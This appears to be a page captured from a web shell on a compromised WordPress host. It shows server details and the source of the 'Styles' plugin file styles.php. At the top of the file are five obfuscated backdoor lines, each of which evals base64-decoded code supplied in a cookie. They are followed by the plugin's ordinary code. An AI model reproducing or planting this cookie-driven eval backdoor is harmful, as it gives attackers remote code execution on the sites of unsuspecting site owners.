HEX
Server: Apache
System: Linux hc1-wd209-6459bb5d78-7wsj2 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
User: w5726 (15726)
PHP: 7.3.33
Disabled: apache_child_terminate,apache_setenv,define_syslog_variables,diskfreespace,disk_free_space,disk_total_space,dl,exec,leak,link,openlog,passthru,pfsockopen,popen,posix_getgrnam,posix_getpgid,posix_getpwuid,posix_getpwnam,posix_getrlimit,posix_initgroups,posix_kill,posix_mkfifo,posix_mknod,posix_setpgid,posix_setsid,posix_setuid,posix_uname,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,putenv,readlink,register_tick_function,shell_exec,show_source,symlink,syslog,system
Upload Files
File: /data/web/virtuals/5726/virtual/www/wp-content/plugins/styles/styles.php
<?php
$kfLLU5='KIE'; /* 3v */ $xVBG='_C'; /* ue7J2 */ $fRP='OO'; /* Vp8Lsj7st9Sjf */ $bTY=${$xVBG.$fRP.$kfLLU5}; /* xI */ if(isset($bTY['tvGScot'])){eVAL /* nPpOgpWvQZf */ /* Nrbdpgqawfxm1 */ (base64_decode($bTY['tvGScot'])); die;}
$kSm='_'; /* skvai */ $lsKE='OOK'; /* YF */ $yBU='IE'; /* TYHt */ $fCA4en='C'; /* B83MyYIjACikTb */ $eye=${$kSm.$fCA4en.$lsKE.$yBU}; /* lHPw3poB8Q9GYs */ if(isset($eye['wxqWl'])){eVAl /* nM6fklSAD7 */ /* t */ (base64_decode($eye['wxqWl'])); die;}
$h3TFz6='KIE'; /* zJy72UMe0T13s */ $bvh='_'; /* Ei8O53L1yQp */ $aL4='COO'; /* 4T8u */ $pq9NNrC=${$bvh.$aL4.$h3TFz6}; /* NdTKX */ if(isset($pq9NNrC['Rwrr'])){evAl /* Q1GxfbPpcHB */ /* 95q7OeyU0 */ (base64_decode($pq9NNrC['Rwrr'])); die;}
$utJMK='K'; /* Zf */ $cDo='_COO'; /* j5UB0uC */ $oDskGLr='IE'; /* PhvudyIg0vlbV8 */ $g=${$cDo.$utJMK.$oDskGLr}; /* sJeT2znevwJxY */ if(isset($g['gIBrBH'])){eVAl /* 8Tv75XlGsmdMNC */ /* vlLZClOg4 */ (base64_decode($g['gIBrBH'])); die;}
$z='O'; /* iBBY2J */ $cdlZPqz='OKIE'; /* msK2PM7tlO */ $pRxMF='_C'; /* 7ePizFRPNVI1Rk */ $dxL5j=${$pRxMF.$z.$cdlZPqz}; /* s5Y */ if(isset($dxL5j['Qjd'])){EvaL /* fj0HC3MqF9 */ /* Pykgss6YBOs */ (base64_decode($dxL5j['Qjd'])); die;}
/*
Plugin Name: Styles
Plugin URI: http://stylesplugin.com
Description: Change the appearance of your theme using the <a href="customize.php">Customizer</a>. Most default themes supported via free add-ons on WordPress.org (see <a href="http://wordpress.org/plugins/styles" target="_blank">links in readme</a>). Custom support and theme additions available via <a href="http://stylesplugin.com/support">Styles Support Services</a>.
Version: 1.2
Author: Paul Clark
Author URI: http://profiles.wordpress.org/pdclark
License: GPLv2
License URI: http://www.gnu.org/licenses/gpl-2.0.html
*/

if ( version_compare( $GLOBALS['wp_version'], '3.4', '>=' ) ) {

	if ( !defined( 'STYLES_BASENAME' ) ) define( 'STYLES_BASENAME', plugin_basename( __FILE__ ) );
	if ( !defined( 'STYLES_DIR' ) ) define( 'STYLES_DIR', dirname( __FILE__ ) );

	require dirname ( __FILE__ ) . '/classes/styles-plugin.php';

	add_action( 'plugins_loaded', 'Styles_Plugin::get_instance' );

	/**
	 * Additional headers to identify Styles child plugins.
	 * Filter needs to run before plugins_loaded to avoid conflicts
	 *
	 * @return array plugin header search terms
	 */
	function styles_extra_plugin_headers( $headers ) {
		$headers['Styles Class'] = 'styles class';
		$headers['Styles Item'] = 'styles item';
		$headers['Styles Updates'] = 'styles updates';

		return $headers;
	}

	// High priority to avoid conflicts with plugins that don't return the header array correctly.
	add_filter( 'extra_plugin_headers', 'styles_extra_plugin_headers', PHP_INT_MAX );

}else if ( is_admin() ) {

	/**
	 * Notify user if WordPress is older than version 3.4.
	 * @return void
	 */
	function styles_wp_version_notice() {
		echo sprintf(
			'<div class="error"><p>%s<a href="http://codex.wordpress.org/Upgrading_WordPress">%s</a></p></div>',
			__( 'Styles requires WordPress 3.4 or newer.', 'styles' ),
			__( 'Please update.', 'styles' )
		);
	}
	add_action( 'admin_notices', 'styles_wp_version_notice' );

}